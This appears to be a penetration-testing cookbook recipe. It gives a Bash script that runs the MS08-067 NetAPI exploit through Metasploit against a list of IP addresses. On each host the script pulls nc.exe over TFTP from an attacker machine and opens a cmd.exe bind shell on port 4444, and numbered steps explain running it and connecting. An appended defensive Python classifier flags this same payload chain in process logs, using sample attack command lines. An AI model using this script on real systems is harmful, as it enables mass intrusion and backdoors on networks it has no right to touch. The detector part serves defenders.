How to do it...

The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This particular script exploits multiple instances of the MS08-067 NetAPI vulnerability by reading targets from an input list of IP addresses:

#!/bin/bash
# Usage: ./multipwn.sh <host file>   (one target IP address per line)

if [ -z "$1" ]; then echo "Usage: ./multipwn.sh <host file>"; exit 1; fi

iplist="$1"

for ip in $(cat "$iplist")
do
  # One terminal per target; msfconsole -x runs the semicolon-separated commands.
  gnome-terminal -x msfconsole -x \
    "use exploit/windows/smb/ms08_067_netapi; set PAYLOAD windows/exec; \
    set RHOST $ip; set CMD cmd.exe /c tftp -i 172.16.69.133 GET nc.exe \
    && nc.exe -lvp 4444 -e cmd.exe; run"
  echo "Exploiting $ip and creating backdoor on TCP port 4444"
done
  1. This script differs from the one discussed in the previous recipe because it installs a backdoor on each target. On each exploited system, a payload is executed that uses the integrated Trivial File Transfer Protocol (TFTP) client to grab the Netcat executable and then uses it to open a listening cmd.exe terminal service on TCP port 4444.
  2. For this to work, a TFTP service needs to be running on the Kali system. This can be done by issuing the following commands:
  3. The first command starts the TFTP service on UDP port 69 with /tmp as the service directory. The second command copies the Netcat executable from the Windows binaries folder to the TFTP directory.
  4. Now, execute the ./multipwn.sh Bash script:
  5. If the script is executed without any arguments, it prints its usage. The usage text indicates that the script must be run with one argument: the name of a text file containing the list of target IP addresses.
  6. Once executed with this argument, a series of new terminals will begin popping up. Each of these terminals runs the exploitation sequence for one of the IP addresses in the input list.
  7. The original execution terminal prints a line for each target as it is launched and indicates that a backdoor will be created on that host.
  8. After the exploitation sequence has completed in each terminal, Netcat can be used to connect to the remote service that was opened by the payload:
  9. In the example provided, connecting to TCP port 4444 on the successfully exploited system with IP address 172.16.69.140 yields remote access to a cmd.exe terminal service.
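From the defender's side, the payload chain this recipe plants (a TFTP fetch of an executable followed by a Netcat listener bound to cmd.exe) is visible in process-creation command lines. The following is an added example, not code from the book: a small Python classifier run over a constructed set of sample command lines; the event format is simplified and the sample lines are made up.

```python
import re
# Constructed sample of Windows process-creation command lines (what a Sysmon
# Event ID 1 or Security 4688 feed carries); not real log data.
SAMPLE_EVENTS = [
    "cmd.exe /c tftp -i 172.16.69.133 GET nc.exe && nc.exe -lvp 4444 -e cmd.exe",
    "tftp -i 10.0.0.5 GET firmware.bin",
    "nc.exe -l -v -p 4444 -e cmd.exe",
    "C:\\Windows\\system32\\svchost.exe -k netsvcs",
]
def split_chain(cmdline):
    """Break a cmd.exe one-liner into its chained sub-commands (&&, ||, |, ;)."""
    return [s for s in re.split(r"\s*(?:&&|\|\||\||;)\s*", cmdline) if s]
def tftp_get_file(cmd):
    """File name fetched by 'tftp [-i] <host> GET <file>', else None."""
    toks = cmd.split()
    low = [t.lower() for t in toks]
    if not ({"tftp", "tftp.exe"} & set(low)) or "get" not in low:
        return None
    j = low.index("get")
    return toks[j + 1] if j + 1 < len(toks) else None
def nc_bind_shell(cmd):
    """(port, program) when netcat listens (-l) and hands the socket to -e; handles '-lvp 4444' and '-l -v -p 4444'."""
    toks = cmd.split()
    idx = next((k for k, t in enumerate(toks) if t.lower() in ("nc", "nc.exe", "ncat")), None)
    if idx is None:
        return None
    args, listen, port, prog, i = toks[idx + 1:], False, None, None, 0
    while i < len(args):
        a = args[i]
        flags = a[1:] if a.startswith("-") else ""   # bundled flags, e.g. "lvp"
        listen = listen or "l" in flags
        if "p" in flags and i + 1 < len(args):      # port follows -p / -lvp
            port, i = args[i + 1], i + 1
        elif "e" in flags and i + 1 < len(args):    # program follows -e
            prog, i = args[i + 1], i + 1
        i += 1
    if listen and prog:
        return (int(port) if port and port.isdigit() else None, prog)
    return None
def classify(cmdline):
    """Severity and findings: the full fetch-then-listen chain rates 'high', either half alone 'medium'."""
    findings = []
    for sub in split_chain(cmdline):
        f = tftp_get_file(sub)
        if f and f.lower().endswith(".exe"):
            findings.append(("tftp_exe_download", f))
        s = nc_bind_shell(sub)
        if s:
            findings.append(("nc_bind_shell", s))
    kinds = {k for k, _ in findings}
    return ("high" if len(kinds) == 2 else "medium" if kinds else None, findings)
```

Running classify over SAMPLE_EVENTS flags the first line as high and the third as medium; the plain firmware fetch and the svchost line produce no findings.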